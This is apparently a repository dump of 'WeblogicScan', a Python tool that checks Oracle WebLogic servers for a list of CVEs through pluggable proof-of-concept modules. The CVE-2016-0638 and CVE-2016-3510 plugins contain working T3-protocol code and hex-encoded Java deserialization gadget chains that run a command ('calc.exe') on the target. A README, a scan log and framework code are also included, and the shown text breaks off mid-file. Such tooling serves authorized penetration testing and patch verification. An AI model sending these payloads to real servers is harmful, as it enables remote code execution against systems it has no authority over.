├── .DS_Store ├── README.md ├── Weblogic.log ├── WeblogicScan.py ├── app ├── __init__.py ├── __pycache__ │ ├── __init__.cpython-36.pyc │ ├── __init__.cpython-37.pyc │ ├── main.cpython-36.pyc │ ├── main.cpython-37.pyc │ ├── platform.cpython-36.pyc │ └── platform.cpython-37.pyc ├── main.py ├── platform.py └── plugins │ ├── CVE-2014-4210.py │ ├── CVE-2016-0638.py │ ├── CVE-2016-3510.py │ ├── CVE-2017-10271.py │ ├── CVE-2017-3248.py │ ├── CVE-2017-3506.py │ ├── CVE-2018-2628.py │ ├── CVE-2018-2893.py │ ├── CVE-2018-2894.py │ ├── CVE-2019-2618.py │ ├── CVE-2019-2725.py │ ├── CVE-2019-2729.py │ ├── WeblogicConsole.py │ ├── __init__.py │ └── __pycache__ │ ├── CVE-2014-4210.cpython-36.pyc │ ├── CVE-2016-0638.cpython-36.pyc │ ├── CVE-2016-3510.cpython-36.pyc │ ├── CVE-2017-10271.cpython-36.pyc │ ├── CVE-2017-3248.cpython-36.pyc │ ├── CVE-2017-3248.cpython-37.pyc │ ├── CVE-2017-3506.cpython-36.pyc │ ├── CVE-2018-2628.cpython-36.pyc │ ├── CVE-2018-2893.cpython-36.pyc │ ├── CVE-2018-2894.cpython-36.pyc │ ├── CVE-2018-2894.cpython-37.pyc │ ├── CVE-2019-2618.cpython-36.pyc │ ├── CVE-2019-2618.cpython-37.pyc │ ├── CVE-2019-2725.cpython-36.pyc │ ├── CVE-2019-2729.cpython-36.pyc │ ├── CVE-2019-2729.cpython-37.pyc │ ├── WeblogicConsole.cpython-36.pyc │ ├── WeblogicConsole.cpython-37.pyc │ ├── __init__.cpython-36.pyc │ ├── __init__.cpython-37.pyc │ ├── cve-2014-4210.cpython-37.pyc │ ├── cve-2016-0638.cpython-37.pyc │ ├── cve-2016-3510.cpython-37.pyc │ ├── cve-2017-10271.cpython-37.pyc │ ├── cve-2017-3428.cpython-37.pyc │ ├── cve-2017-3506.cpython-37.pyc │ ├── cve-2018-2628.cpython-37.pyc │ ├── cve-2018-2893.cpython-37.pyc │ ├── cve-2019-2725.cpython-37.pyc │ ├── plugin1.cpython-37.pyc │ └── plugin2.cpython-37.pyc ├── requirements.txt └── weblogicscan.png /.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/.DS_Store -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # WeblogicScan 2 | 3 | 增强版WeblogicScan 从rabbitmask大佬的WeblogicScan V1.2 版本修改而来。 修改前源项目地址:https://github.com/rabbitmask/WeblogicScan 4 | 5 | ![weblogicscan](weblogicscan.png) 6 | 7 | # DEFF 8 | 9 | * 支持Python3 10 | * 修复漏洞检测误报,漏洞检测结果更精确 11 | * 添加CVE-2019-2729, CVE-2019-2618漏洞检测 12 | * 插件化漏洞扫描组件 13 | * 添加彩色打印 14 | 15 | # INSTALL 16 | 17 | ``` 18 | pip3 install -r requirements.txt 19 | ``` 20 | 21 | # Useage 22 | 23 | ``` 24 | python3 WeblogicScan.py 192.168.1.1 7001 25 | ``` 26 | 27 | # 支持CVE 28 | 29 | * CVE-2014-4210 30 | 31 | * CVE-2016-0638 32 | 33 | * CVE-2016-3510 34 | 35 | * CVE-2017-3428 36 | 37 | * CVE-2017-3506 38 | 39 | * CVE-2017-10271 40 | 41 | * CVE-2018-2628 42 | 43 | * CVE-2018-2893 44 | 45 | * CVE-2018-2894 46 | 47 | * CVE-2019-2618 48 | 49 | * CVE-2019-2725 50 | 51 | * CVE-2019-2729 52 | 53 | 54 | 55 | # EXTENDS 56 | 57 | 如果想添加其他CVE或其他Weblogic漏洞,只需要按照如下规则填写插件即可: 58 | 59 | ```python 60 | #!/usr/bin/env python 61 | # _*_ coding:utf-8 _*_ 62 | 63 | import logging 64 | import sys 65 | import requests 66 | 67 | from ..platform import ManageProcessor,Color 68 | 69 | logging.basicConfig(filename='Weblogic.log', 70 | format='%(asctime)s %(message)s', 71 | filemode="w", level=logging.INFO) 72 | 73 | headers = {'user-agent': 'ceshi/0.0.1'} 74 | 75 | 76 | @ManageProcessor.plugin_register('CVE201XXXXX') 77 | class CVE201XXXXX(object): 78 | def process(self,ip,port): 79 | self.run(ip,port) 80 | 81 | def run(self,url,port): 82 | ...... 83 | your POC payload ...... 84 | if (success): 85 | print(Color.OKGREEN+'[+]CVE201XXXXX 漏洞存在'+Color.ENDC) 86 | ``` 87 | 88 | 89 | 90 | 并在 `app/plugins/__init__.py`下添加文件名即可。 91 | 92 | `__init__.py` 93 | 94 | ``` 95 | #!/usr/bin/env python 96 | # _*_ coding:utf-8 _*_ 97 | 98 | __all__ = ['WeblogicConsole', 'CVE-2019-2618','CVE-2014-4210','CVE-2019-2725','CVE-2019-2729','CVE-2017-10271','CVE-2017-3506','CVE-2018-2894','CVE-2018-2628','CVE-2018-2893','CVE-2016-0638','CVE-2016-3510','CVE-2017-3248','CVE-201X-XXXX'] 99 | ``` 100 | 101 | 102 | 103 | # Thanks 104 | 105 | 感谢Daybreak的CVE-2019-2618 检测脚本 106 | 107 | # UPDATES 108 | 109 | 修复了一些POC存在的问题,请表哥们及时git clone 新的代码。由于脚本改的比较仓促,表哥们发现一些bug可直接发issue,逐步改进。 110 | 111 | # NOTES 112 | 113 | 目前暂不支持Weblogic 10.3.6 Weblogic 12.1.3.0.0和Weblogic12.2.1.3.0 JDK1.7版本的CVE-2019-2729漏洞检测。 -------------------------------------------------------------------------------- /Weblogic.log: -------------------------------------------------------------------------------- 1 | 2019-06-24 11:33:49,382 [+]The target Weblogic console address is exposed! The path is: http://192.168.43.36:7001/console/login/LoginForm.jsp Please try weak password blasting! 2 | 2019-06-24 11:33:49,396 [+]The target Weblogic UDDI module is exposed! The path is: http://192.168.43.36:7001/uddiexplorer/ Please verify the SSRF vulnerability! 3 | 2019-06-24 11:33:52,431 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2019-2725 4 | 2019-06-24 11:33:56,520 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2019-2729 5 | 2019-06-24 11:33:56,607 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2017-10271 6 | 2019-06-24 11:33:56,630 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2017-3506 7 | 2019-06-24 11:33:56,780 [-]Target weblogic not detected CVE-2018-2894 8 | 2019-06-24 11:34:17,003 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2018-2628 9 | -------------------------------------------------------------------------------- /WeblogicScan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import sys 5 | 6 | from app.main import pentest 7 | from app.platform import Color 8 | 9 | version = "1.3.1" 10 | banner=''' 11 | __ __ _ _ _ ____ 12 | \ \ / /__| |__ | | ___ __ _(_) ___ / ___| ___ __ _ _ __ 13 | \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \ 14 | \ V V / __/ |_) | | (_) | (_| | | (__ ___) | (_| (_| | | | | 15 | \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_| 16 | |___/ 17 | From WeblogicScan V1.2 Fixed by Ra1ndr0op: drops.org.cn | V {} 18 | '''.format(version) 19 | print(Color.OKYELLOW+banner+Color.ENDC) 20 | print('Welcome To WeblogicScan !!') 21 | if len(sys.argv)<3: 22 | print('Usage: python3 WeblogicScan [IP] [PORT]') 23 | else: 24 | ip = sys.argv[1] 25 | port = int(sys.argv[2]) 26 | pentest(ip,port) 27 | 28 | -------------------------------------------------------------------------------- /app/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | from .plugins import * -------------------------------------------------------------------------------- /app/__pycache__/__init__.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/__pycache__/__init__.cpython-36.pyc -------------------------------------------------------------------------------- /app/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /app/__pycache__/main.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/__pycache__/main.cpython-36.pyc -------------------------------------------------------------------------------- /app/__pycache__/main.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/__pycache__/main.cpython-37.pyc -------------------------------------------------------------------------------- /app/__pycache__/platform.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/__pycache__/platform.cpython-36.pyc -------------------------------------------------------------------------------- /app/__pycache__/platform.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/__pycache__/platform.cpython-37.pyc -------------------------------------------------------------------------------- /app/main.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | 5 | from .platform import ManageProcessor 6 | 7 | def pentest(ip,port): 8 | processor = ManageProcessor() 9 | #print(processor.PLUGINS) # {’plugin1': } 10 | processed = processor.process(ip,port) 11 | #processed = processor.process(text="**foo bar**", plugins=('plugin2',)) 12 | -------------------------------------------------------------------------------- /app/platform.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | class ManageProcessor(object): 5 | PLUGINS = {} 6 | 7 | def process(self,ip,port,plugins=()): 8 | if plugins is (): 9 | for plugin_name in self.PLUGINS.keys(): 10 | try: 11 | print(Color.OKYELLOW+"[*]开始检测",plugin_name+Color.ENDC) 12 | self.PLUGINS[plugin_name]().process(ip,port) 13 | except: 14 | print (Color.WARNING+"[-]{} 未成功检测,请检查网络连接或或目标存在负载中间件".format(plugin_name)+Color.ENDC) 15 | else: 16 | for plugin_name in plugins: 17 | try: 18 | print("[*]开始检测 ",self.PLUGINS[plugin_name]) 19 | self.PLUGINS[plugin_name]().process(ip,port) 20 | except: 21 | print ("[-]{}未成功检测,请检查网络连接或或目标存在负载中间".format(self.PLUGINS[plugin_name])) 22 | return 23 | 24 | @classmethod 25 | def plugin_register(cls, plugin_name): 26 | def wrapper(plugin): 27 | cls.PLUGINS.update({plugin_name:plugin}) 28 | return plugin 29 | return wrapper 30 | 31 | class Color: 32 | HEADER = '\033[95m' 33 | OKBLUE = '\033[90m' 34 | OKGREEN = '\033[92m' 35 | OKYELLOW = '\33[93m' 36 | WARNING = '\033[91m' 37 | FAIL = '\033[91m' 38 | ENDC = '\033[0m' 39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /app/plugins/CVE-2014-4210.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | 5 | import logging 6 | import sys 7 | import requests 8 | 9 | from ..platform import ManageProcessor,Color 10 | 11 | logging.basicConfig(filename='Weblogic.log', 12 | format='%(asctime)s %(message)s', 13 | filemode="w", level=logging.INFO) 14 | 15 | headers = {'user-agent': 'ceshi/0.0.1'} 16 | 17 | 18 | @ManageProcessor.plugin_register('SSRF') 19 | class SSRF(object): 20 | def process(self,ip,port): 21 | self.run(ip,port) 22 | 23 | def islive(self,ur,port): 24 | url='http://' + str(ur)+':'+str(port)+'/uddiexplorer/' 25 | r = requests.get(url, headers=headers) 26 | return r.status_code 27 | 28 | def run(self,url,port): 29 | if self.islive(url,port)==200: 30 | u='http://' + str(url)+':'+str(port)+'/uddiexplorer/' 31 | logging.info('[+]The target Weblogic UDDI module is exposed! The path is: {} Please verify the SSRF vulnerability!'.format(u)) 32 | print(Color.OKBLUE+'[+]The target Weblogic UDDI module is exposed!\n[+]The path is: {}\n[+]Please verify the SSRF vulnerability!'.format(u)+Color.ENDC) 33 | print(Color.OKGREEN+'[+]SSRF 漏洞存在'+Color.ENDC) 34 | else: 35 | logging.info("[-]The target Weblogic UDDI module default path does not exist!") 36 | print(Color.FAIL+"[-]The target Weblogic UDDI module default path does not exist!"+Color.ENDC) -------------------------------------------------------------------------------- /app/plugins/CVE-2016-0638.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import logging 5 | import socket 6 | import sys 7 | import time 8 | import re 9 | 10 | from ..platform import ManageProcessor,Color 11 | 12 | 13 | VUL='CVE-2016-0638' 14 | PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'] 15 | VER_SIG=['weblogic.jms.common.StreamMessageImpl'] 16 | 17 | 18 | logging.basicConfig(filename='Weblogic.log', 19 | format='%(asctime)s %(message)s', 20 | filemode="w", level=logging.INFO) 21 | 22 | 23 | @ManageProcessor.plugin_register('CVE20160638') 24 | class CVE20160638(object): 25 | def process(self,ip,port): 26 | self.run(ip,port,0) 27 | 28 | def t3handshake(self,sock,server_addr): 29 | sock.connect(server_addr) 30 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 31 | time.sleep(1) 32 | sock.recv(1024) 33 | 34 | def buildT3RequestObject(self,sock,port): 35 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 36 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port)) 37 | data3 = '1a7727000d3234322e323134' 38 | data4 = '2e312e32353461863d1d0000000078' 39 | for d in [data1,data2,data3,data4]: 40 | sock.send(bytes.fromhex(d)) 41 | time.sleep(2) 42 | 43 | def sendEvilObjData(self,sock,data): 44 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 45 | payload+=data 46 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 47 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload) 48 | sock.send(bytes.fromhex(payload)) 49 | res = '' 50 | try: 51 | while True: 52 | res += sock.recv(4096).decode('utf-8','ignore') 53 | time.sleep(0.1) 54 | except Exception: 55 | pass 56 | return res 57 | def checkVul(self,res,index): 58 | p=re.findall(VER_SIG[index], res, re.S) 59 | if len(p)>0: 60 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL)) 61 | print(Color.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL)+Color.ENDC) 62 | print(Color.OKGREEN+'[+]CVE-2016-0638漏洞存在'+Color.ENDC) 63 | else: 64 | logging.info('[-]Target weblogic not detected {}'.format(VUL)) 65 | print (Color.FAIL+'[-]Target weblogic not detected {}'.format(VUL)+Color.ENDC) 66 | 67 | def run(self,ip,port,index): 68 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 69 | sock.settimeout(5) 70 | server_addr = (ip, port) 71 | self.t3handshake(sock,server_addr) 72 | self.buildT3RequestObject(sock,port) 73 | rs=self.sendEvilObjData(sock,PAYLOAD[index]) 74 | self.checkVul(rs,index) 75 | 76 | 77 | -------------------------------------------------------------------------------- /app/plugins/CVE-2016-3510.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import logging 5 | import socket 6 | import sys 7 | import time 8 | import re 9 | 10 | from ..platform import ManageProcessor,Color 11 | 12 | VUL=['CVE-2016-3510'] 13 | PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'] 14 | VER_SIG=['org.apache.commons.collections.functors.InvokerTransformer'] 15 | 16 | logging.basicConfig(filename='Weblogic.log', 17 | format='%(asctime)s %(message)s', 18 | filemode="w", level=logging.INFO) 19 | 20 | 21 | @ManageProcessor.plugin_register('CVE20163510') 22 | class CVE20163510(object): 23 | def process(self,ip,port): 24 | self.run(ip,port,0) 25 | 26 | def t3handshake(self,sock,server_addr): 27 | sock.connect(server_addr) 28 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 29 | time.sleep(1) 30 | sock.recv(1024) 31 | def buildT3RequestObject(self,sock,port): 32 | data1 = 